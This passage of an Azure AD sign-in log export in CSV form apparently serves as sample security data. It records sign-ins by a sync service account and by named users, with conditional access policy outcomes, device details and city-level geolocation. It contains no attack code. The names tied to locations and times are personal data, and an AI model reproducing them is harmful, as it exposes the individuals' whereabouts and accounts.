JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 02:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",d774c493-40b1-4743-b785-3f4a4d860300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,d774c493-40b1-4743-b785-3f4a4d860300,SigninLogs,Sucess,36.6404686,-78.26995087
+1813,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:54.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,32d87351-ebb4-4ba2-a65b-af8762f9384c,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 02:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",93ca542e-4eab-45c4-8608-b715f5400200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,93ca542e-4eab-45c4-8608-b715f5400200,SigninLogs,Sucess,36.6404686,-78.26995087
+1814,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:05.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,dc8f105e-41db-4d2b-bd95-5f1707e826b0,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 20:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",c0ce23b7-81fe-4875-94a5-4bf39e310100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c0ce23b7-81fe-4875-94a5-4bf39e310100,SigninLogs,Sucess,36.6404686,-78.26995087
+1815,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:59.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5e2c109c-b4b8-4d9a-ae99-156a252f79d7,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 22:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",93c39a76-bdc9-4bb7-bb78-632009440300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,93c39a76-bdc9-4bb7-bb78-632009440300,SigninLogs,Sucess,36.6404686,-78.26995087
+1816,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:59.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0979c8f4-572e-4941-88f8-17fa4ff7c905,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 22:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",8ccd2b23-7303-4913-b6ad-508705b60200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8ccd2b23-7303-4913-b6ad-508705b60200,SigninLogs,Sucess,36.6404686,-78.26995087
+1817,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:05.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c7a226b8-b7ad-45a1-bc3e-981dd3a2bd2c,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 22:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",a0e1445e-999f-4508-8480-47b051450300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,a0e1445e-999f-4508-8480-47b051450300,SigninLogs,Sucess,36.6404686,-78.26995087
+1818,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:40.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 19:03,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",e9c15e3c-0237-406d-a880-6953a7aa5000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,e9c15e3c-0237-406d-a880-6953a7aa5000,SigninLogs,Sucess,35.01296997,-80.93171692
+1819,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:05.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:37,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",67310a2e-a313-4902-99ba-eeb2ffc91700,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,67310a2e-a313-4902-99ba-eeb2ffc91700,SigninLogs,Sucess,33.0175209,35.44601059
+1820,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:02.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b8d6a3ee-0f7e-4414-876f-a9c04647dc69,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': 